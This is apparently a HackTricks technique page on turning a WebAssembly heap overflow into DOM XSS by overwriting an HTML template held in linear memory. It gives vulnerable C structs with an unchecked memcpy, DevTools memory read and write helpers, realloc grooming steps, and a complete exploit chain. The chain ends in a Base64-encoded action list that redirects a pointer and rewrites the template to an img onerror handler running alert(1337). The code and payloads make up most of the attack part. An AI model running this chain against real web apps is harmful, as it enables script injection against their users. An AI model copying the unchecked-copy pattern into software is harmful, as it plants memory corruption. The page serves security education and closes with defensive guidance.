WebAssembly linear memory corruption to DOM XSS (template overwrite)

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the Telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud GitHub repos.

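This technique shows how to turn a memory-corruption bug in an Emscripten-compiled WebAssembly (WASM) module into a reliable DOM XSS, even when input is sanitized. The pivot is to leave the sanitized source string alone and instead corrupt writable constants in WASM linear memory, such as HTML format templates.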

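Key idea: in the WebAssembly model, code is kept outside linear memory and cannot be written. The module's data (heap, stack, globals, "constants") lives in a single flat linear memory made of 64 KiB pages, and the module can write anywhere inside it. If buggy C/C++ code writes past the end of an object, it can overwrite adjacent objects and even constant strings embedded in linear memory. When such a constant is later used to build HTML that is inserted through a DOM sink, sanitizer-encoded input can be turned into executable JavaScript.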
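A minimal sketch of the key idea, assuming Node.js or a browser console with the standard WebAssembly, TextEncoder and TextDecoder globals. The module bytes are hand-assembled for illustration (this is not Emscripten output) and the template string is hypothetical. A data segment copies the template into linear memory when the module is instantiated. After that, an ordinary store rewrites it without any fault.

```javascript
// Hand-assembled module for illustration (not Emscripten output): it exports
// one memory as "mem" and has an active data segment that copies a
// hypothetical template string to linear-memory offset 16 at instantiation.
const enc = new TextEncoder();
const dec = new TextDecoder();
const tplBytes = Array.from(enc.encode("<p>%.*s</p>")); // 11 bytes

const wasmBytes = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,       // "\0asm", version 1
  0x05, 0x03, 0x01, 0x00, 0x01,                         // memory section: 1 memory, min 1 page
  0x07, 0x07, 0x01, 0x03, 0x6d, 0x65, 0x6d, 0x02, 0x00, // export section: "mem" -> memory 0
  0x0b, 6 + tplBytes.length, 0x01,                      // data section (size fits one LEB128 byte)
  0x00, 0x41, 0x10, 0x0b,                               // active segment at i32.const 16
  tplBytes.length, ...tplBytes,                         // segment bytes
]);

const instance = new WebAssembly.Instance(new WebAssembly.Module(wasmBytes));
const heap = new Uint8Array(instance.exports.mem.buffer);
const readStr = (ptr, len) => dec.decode(heap.subarray(ptr, ptr + len));

console.log(readStr(16, tplBytes.length)); // <p>%.*s</p>
heap.set(enc.encode("<b>"), 16);           // an ordinary store, no fault
console.log(readStr(16, tplBytes.length)); // <b>%.*s</p>
```

No page in linear memory is read-only, so an out-of-bounds write inside the module can do the same thing that the JS store does here.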

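Threat model and prerequisites

The web app uses Emscripten glue (Module.cwrap) to call into the WASM module.
Application state lives in WASM linear memory (e.g., C structs holding pointers/lengths to user buffers).
The input sanitizer encodes metacharacters before storage, but later rendering builds HTML from a format string stored in WASM linear memory.
A linear-memory corruption primitive exists (e.g., heap overflow, UAF, or an unchecked memcpy).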
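To make the sanitizer prerequisite concrete, here is a hypothetical encoder of the kind described. The real app's rules may differ. It neutralizes markup in a message. A bare expression such as alert(1337) contains no metacharacters, though, so it passes through unchanged. The template overwrite depends on that.

```javascript
// Hypothetical sanitizer: HTML-encode metacharacters before storage.
const META = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function encodeMeta(input) {
  return input.replace(/[&<>"']/g, (ch) => META[ch]);
}

console.log(encodeMeta('<img src=x onerror="alert(1)">'));
// &lt;img src=x onerror=&quot;alert(1)&quot;&gt;
console.log(encodeMeta("alert(1337)"));
// alert(1337)  (nothing to encode)
```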

Minimal vulnerable data model (example)

#include <stddef.h>  // size_t

typedef struct msg {
    char *msg_data;       // pointer to message bytes
    size_t msg_data_len;  // length after sanitization
    int msg_time;         // timestamp
    int msg_status;       // flags
} msg;

typedef struct stuff {
    msg *mess;            // dynamic array of msg
    size_t size;          // used
    size_t capacity;      // allocated
} stuff; // global chat state in linear memory
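You need the struct offsets to craft overflow payloads. This sketch assumes a wasm32 build (the Emscripten default), where pointers, size_t and int are all 4-byte little-endian. Under that assumption, sizeof(msg) is 16 and sizeof(stuff) is 12, with no padding. readMsg, readStuff and msgAddr are hypothetical helper names.

```javascript
// Assumes wasm32: char*, size_t and int are 4 bytes, little-endian, no padding.
const MSG_SIZE = 16; // sizeof(msg) under that assumption

// Decode one msg struct at addr from a linear-memory view (e.g. Module.HEAPU8).
function readMsg(heap, addr) {
  const dv = new DataView(heap.buffer, heap.byteOffset);
  return {
    msg_data: dv.getUint32(addr + 0, true),     // char *
    msg_data_len: dv.getUint32(addr + 4, true), // size_t
    msg_time: dv.getInt32(addr + 8, true),      // int
    msg_status: dv.getInt32(addr + 12, true),   // int
  };
}

// Decode the stuff struct (the global chat state).
function readStuff(heap, addr) {
  const dv = new DataView(heap.buffer, heap.byteOffset);
  return {
    mess: dv.getUint32(addr + 0, true), // msg * (array base)
    size: dv.getUint32(addr + 4, true),
    capacity: dv.getUint32(addr + 8, true),
  };
}

// Address of s->mess[i] given the array base pointer.
const msgAddr = (messBase, i) => messBase + i * MSG_SIZE;
```

In DevTools, pass Module.HEAPU8 as heap and the address of the global s (captured at a breakpoint) to readStuff(). Then walk the mess array with msgAddr() and readMsg().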

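Vulnerable logic pattern

addMsg(): allocates a new buffer for the sanitized input and appends a msg to s.mess, doubling the capacity with realloc when needed.
editMsg(): re-sanitizes the input and memcpy's the new bytes into the existing buffer without checking that the new length ≤ the old allocation → heap overflow inside linear memory.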
populateMsgHTML(): formats the sanitized text with a fixed template such as "<article><p>%.*s</p></article>" that resides in linear memory. The returned HTML lands in a DOM sink (e.g., innerHTML).
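The editMsg() flaw fits in a few lines. This is a toy sketch with hypothetical helpers, not the app's code. A plain Uint8Array stands in for linear memory, and an 8-byte buffer is followed directly by a 4-byte pointer field. Nothing separates objects in linear memory, so the unchecked copy overwrites the pointer. The checked variant shows the length test that is missing.

```javascript
// Toy model of the editMsg() bug (hypothetical helpers, not the app's code).
// Linear memory is one flat Uint8Array, so a copy that trusts the new length
// spills into whatever object follows the buffer.
function editUnchecked(heap, bufPtr, newBytes) {
  heap.set(newBytes, bufPtr); // like memcpy(buf, src, new_len) with no capacity check
}

function editChecked(heap, bufPtr, bufCapacity, newBytes) {
  if (newBytes.length > bufCapacity) {
    throw new RangeError(`new length ${newBytes.length} exceeds capacity ${bufCapacity}`);
  }
  heap.set(newBytes, bufPtr);
}

// Layout: an 8-byte message buffer at offset 0, immediately followed by a
// 4-byte little-endian pointer field at offset 8 (standing in for msg_data).
const heap = new Uint8Array(16);
const view = new DataView(heap.buffer);
view.setUint32(8, 0x400, true); // original pointer value

// 8 filler bytes reach the end of the buffer; the next 4 replace the pointer.
const payload = Uint8Array.from([...new Array(8).fill(0x41), 0x50, 0x00, 0x01, 0x00]);
editUnchecked(heap, 0, payload);
console.log(view.getUint32(8, true).toString(16)); // 10050
```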

Allocator grooming with realloc()

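#include <stdlib.h>  // realloc, exit

// Appends new_msg to s->mess, doubling the array when it is full.
int add_msg_to_stuff(stuff *s, msg new_msg) {
    if (s->size >= s->capacity) {
        s->capacity *= 2;
        // realloc() may move the array to a new address in linear memory
        s->mess = (msg *)realloc(s->mess, s->capacity * sizeof(msg));
        if (s->mess == NULL) exit(1);
    }
    s->mess[s->size++] = new_msg;
    return s->size - 1;
}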

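Send enough messages to exceed the initial capacity. After the growth, realloc() often places s->mess right after the last user buffer in linear memory.
Overflow the last message via editMsg() to corrupt fields inside s->mess (e.g., overwrite a msg_data pointer) → arbitrary pointer rewrite within linear memory: the next edit of that message writes to an attacker-chosen address, and the data there is later rendered.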
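A toy allocator shows why the message count matters. This sketch assumes a bump allocator that never grows a block in place and never reuses chunks. Emscripten's dlmalloc/emmalloc add chunk headers and free lists, so real offsets differ. The initial capacities below are hypothetical. Because addMsg() allocates the message buffer before appending, the reallocated array lands right after the buffer of the message that triggered the growth.

```javascript
// Toy bump allocator (hypothetical): every malloc/realloc returns fresh memory
// at the top of the heap, 8-byte aligned, and realloc never grows in place.
function makeBumpHeap(base = 1024) {
  let top = base;
  const align8 = (n) => (n + 7) & ~7;
  return {
    malloc(size) {
      const p = top;
      top += align8(size);
      return p;
    },
    realloc(_oldPtr, size) { return this.malloc(size); }, // copying omitted
  };
}

// Replays addMsg(): allocate the message buffer first, then append to s->mess,
// doubling the capacity (and moving the array) when it is full.
function simulateAdds(count, initialCapacity, msgLen, msgSize = 16) {
  const heap = makeBumpHeap();
  let capacity = initialCapacity;
  let mess = heap.malloc(capacity * msgSize);
  const buffers = [];
  for (let size = 0; size < count; size++) {
    buffers.push(heap.malloc(msgLen)); // sanitized message bytes
    if (size >= capacity) {            // add_msg_to_stuff() growth path
      capacity *= 2;
      mess = heap.realloc(mess, capacity * msgSize);
    }
  }
  return { mess, buffers };
}

const r = simulateAdds(11, 10, 3);   // hypothetical: capacity 10, "hi\0" messages
console.log(r.mess - r.buffers[10]); // 8: the array starts right after the last buffer
```

With an initial capacity of 8 instead, growth happens on the ninth message and the later buffers land after the array. Overflowing the last buffer would then miss s->mess, so choose the message count so that the message you overflow is the one that triggers growth.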

Exploit pivot: overwrite the HTML template (sink) instead of the sanitized source

Sanitization protects input, not sinks. Find the format stub used by populateMsgHTML(), e.g.:
"<article><p>%.*s</p></article>" → change to "<img src=1 onerror=%.*s>"
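The stub can be located deterministically by scanning linear memory, because it is a plain byte string in Module.HEAPU8.
Once the stub is overwritten, the sanitized message content becomes the JavaScript onerror handler. Adding a new message with text such as alert(1337) then renders <img src=1 onerror=alert(1337)>, which executes immediately in the DOM.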
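Here is a byte-level sketch of the overwrite. It assumes the stub is the 30-byte "<article><p>%.*s</p></article>" followed by a NUL, and that message 0's msg_data already points at stubAddr + 1. stubAddr and render are hypothetical, and render is a simplified stand-in for the C formatter. The padded edit string from the example action list below covers template bytes 1..28, so the original leading '<' and the final '>' both survive.

```javascript
// Byte-level sketch of the sink overwrite. Assumptions: the stub is the 30-byte
// "<article><p>%.*s</p></article>" followed by a NUL, it sits at a hypothetical
// stubAddr, and message 0's msg_data already points at stubAddr + 1.
const enc = new TextEncoder();
const dec = new TextDecoder();

const heap = new Uint8Array(64);
const stubAddr = 8; // hypothetical; in practice the offset searchWasmMemory() reports
heap.set(enc.encode("<article><p>%.*s</p></article>\0"), stubAddr);

// Editing message 0 copies its bytes over template bytes 1..28 (no NUL in this model).
heap.set(enc.encode("img src=1      onerror=%.*s "), stubAddr + 1);

// Read the template back as a C string (up to the NUL terminator).
const tpl = dec.decode(heap.subarray(stubAddr, heap.indexOf(0, stubAddr)));

// Minimal stand-in for formatting with "%.*s": insert at most len chars of text.
const render = (fmt, text, len = text.length) => fmt.replace("%.*s", text.slice(0, len));

console.log(tpl);                        // <img src=1      onerror=%.*s >
console.log(render(tpl, "alert(1337)")); // <img src=1      onerror=alert(1337) >
```

In this model, the six spaces make the write exactly 28 bytes long. The template's own trailing '>' therefore closes the injected tag, and no terminator has to be written.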

Chrome DevTools workflow (Emscripten glue)

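Set a breakpoint at the first Module.cwrap call in the JS glue and step into the wasm call site to capture pointer arguments (numeric offsets into linear memory).
Use typed views such as Module.HEAPU8 to read/write WASM memory from the console.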
Helper snippets:

javascript

// Assumes the build exposes Module.HEAPU8. Emscripten recreates the view when
// memory grows, so look it up on every call instead of caching it.
const heapU8 = () => Module.HEAPU8;

function writeBytes(ptr, byteArray){
  if(!Array.isArray(byteArray)) throw new Error("byteArray must be an array of numbers");
  for(let i=0;i<byteArray.length;i++){
    const byte = byteArray[i];
    if(!Number.isInteger(byte)||byte<0||byte>255) throw new Error(`Invalid byte at index ${i}: ${byte}`);
  }
  heapU8().set(byteArray, ptr); // all bytes validated, write them in one call
}
function readBytes(ptr,len){ return Array.from(heapU8().subarray(ptr,ptr+len)); }
// Printable ASCII as-is, everything else as '.'
function readBytesAsChars(ptr,len){
  const bytes=heapU8().subarray(ptr,ptr+len);
  return Array.from(bytes).map(b=>(b>=32&&b<=126)?String.fromCharCode(b):'.').join('');
}
// Logs every match and returns the first offset, or -1 if there is none
function searchWasmMemory(str){
  const mem=heapU8(), pat=new TextEncoder().encode(str);
  let first=-1;
  for(let i=0;i<=mem.length-pat.length;i++){
    let ok=true;
    for(let j=0;j<pat.length;j++){ if(mem[i+j]!==pat[j]){ ok=false; break; } }
    if(ok){
      console.log(`Found "${str}" at memory address:`, i);
      if(first===-1) first=i;
    }
  }
  if(first===-1) console.log(`"${str}" not found in memory`);
  return first;
}
// little-endian bytes -> unsigned int (multiplication avoids the sign flip of b<<24)
const a = bytes => bytes.reduce((acc, b, i) => acc + b * 2 ** (8*i), 0);
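The inverse of the a helper is handy for building the overflow payload or patching a pointer from the console. The names u32ToBytesLE and writeU32 below are hypothetical, and the sketch assumes 4-byte little-endian wasm32 pointers:

```javascript
// Turn a linear-memory address into the 4 bytes a wasm32 pointer field holds.
function u32ToBytesLE(value) {
  if (!Number.isInteger(value) || value < 0 || value > 0xffffffff) {
    throw new RangeError(`not a u32: ${value}`);
  }
  return [value & 0xff, (value >>> 8) & 0xff, (value >>> 16) & 0xff, (value >>> 24) & 0xff];
}

// Overwrite a 4-byte pointer field in place, e.g. msg_data of a msg struct.
function writeU32(heap, addr, value) {
  heap.set(u32ToBytesLE(value), addr);
}
```

For example, writeU32(Module.HEAPU8, msg0Addr, stubAddr + 1) would redirect message 0 from the console. msg0Addr and stubAddr are hypothetical names for addresses you recovered earlier.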

End-to-end exploitation recipe

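Groom: Add N small messages to trigger realloc(), so that s->mess lands directly after the last user buffer.
Overflow: Call editMsg() on the last message with a longer payload that overwrites an entry in s->mess, setting message 0's msg_data to point at (stub_addr + 1). The +1 skips the leading '<', so the next edit leaves it in place and the injected tag stays well-formed.
Template rewrite: Edit message 0 so that its bytes overwrite the template with "img src=1 onerror=%.*s ".
Trigger XSS: Add a new message whose sanitized content is JavaScript, e.g., alert(1337). Rendering emits <img src=1 onerror=alert(1337)>, which executes.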

Example action list to serialize and place in ?s= (Base64-encode with btoa before use)

json

[
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"edit","msgId":10,"content":"aaaaaaaaaaaaaaaa.\u0000\u0001\u0000\u0050","time":1756885686080},
{"action":"edit","msgId":0,"content":"img src=1      onerror=%.*s ","time":1756885686080},
{"action":"add","content":"alert(1337)","time":1756840476392}
]
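Here is a sketch of serializing the list above into the ?s= parameter. It assumes the app reads the parameter with URLSearchParams (which undoes percent-encoding) and then calls atob() and JSON.parse(). The host is a placeholder. JSON.stringify() escapes the control characters as \u0000 and \u0001, so the JSON is pure ASCII and btoa() accepts it. encodeURIComponent() protects the +, / and = characters that Base64 can emit.

```javascript
// Serialize the action list and encode it for the ?s= parameter (sketch).
function buildStateParam(actions) {
  const json = JSON.stringify(actions);  // control chars become \u0000-style escapes
  return encodeURIComponent(btoa(json)); // Base64 may contain + / =, so URL-encode it
}

const actions = [
  ...Array.from({ length: 11 }, () => ({ action: "add", content: "hi", time: 1756840476392 })),
  { action: "edit", msgId: 10, content: "aaaaaaaaaaaaaaaa.\u0000\u0001\u0000\u0050", time: 1756885686080 },
  { action: "edit", msgId: 0, content: "img src=1      onerror=%.*s ", time: 1756885686080 },
  { action: "add", content: "alert(1337)", time: 1756840476392 },
];

const url = `https://target.example/?s=${buildStateParam(actions)}`; // placeholder host
console.log(url);
```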

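Why this bypass works

WASM prevents executing code from linear memory, but linear memory has no read-only regions. "Constant" data stored there is writable, so buggy program logic can modify it.
The sanitizer only protects the source string. Once the sink (the HTML template) is corrupted, sanitized input becomes the value of a JS event handler and executes when the HTML is inserted into the DOM.
realloc()-driven adjacency plus an unchecked memcpy in the edit flow allow a pointer to be corrupted, which redirects writes to attacker-chosen addresses in linear memory.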

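Generalization and other attack surfaces

Any HTML template, JSON skeleton, or URL pattern embedded in linear memory can be targeted to change how downstream code interprets sanitized data.
Other common WASM pitfalls: out-of-bounds writes/reads in linear memory, UAF on heap objects, function-table abuse via unchecked indirect-call indices, and JS↔WASM glue mismatches.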

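Defensive guidance

In edit paths, verify that new length ≤ capacity. Either resize the buffer before copying (realloc to new_len) or use size-bounded APIs (snprintf/strlcpy), and track capacity.
Keep immutable templates out of writable linear memory, or integrity-check them before use.
Treat the JS↔WASM boundary as untrusted: validate pointer ranges/lengths, fuzz exported interfaces, and cap memory growth.
Sanitize at the sink: avoid building HTML in WASM, and prefer safe DOM APIs over innerHTML-style templating.
Do not trust state embedded in the URL for privileged flows.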
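A sketch of the integrity-check option, using hypothetical helpers. At startup, copy the template bytes into a JS-owned buffer outside linear memory, where no WASM store can reach it. Then compare against that copy before each render. This only helps if the rendering path actually calls the check. It also cannot catch corruption that happens inside the same WASM call that uses the template. Moving the template out of writable memory is the stronger fix.

```javascript
// Copy the template bytes into a JS-owned buffer (not WASM linear memory).
function snapshotTemplate(heap, addr, len) {
  return heap.slice(addr, addr + len); // slice() copies; subarray() would alias
}

// True if the bytes at addr still match the snapshot.
function templateIntact(heap, addr, snapshot) {
  for (let i = 0; i < snapshot.length; i++) {
    if (heap[addr + i] !== snapshot[i]) return false;
  }
  return true;
}

// Demo on a stand-in heap (use Module.HEAPU8 in the real app).
const heap = new Uint8Array(32);
heap.set(new TextEncoder().encode("<p>%.*s</p>"), 4);
const snap = snapshotTemplate(heap, 4, 11);
console.log(templateIntact(heap, 4, snap)); // true
heap[5] = 0x62;                            // simulated corruption: 'p' -> 'b'
console.log(templateIntact(heap, 4, snap)); // false
```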
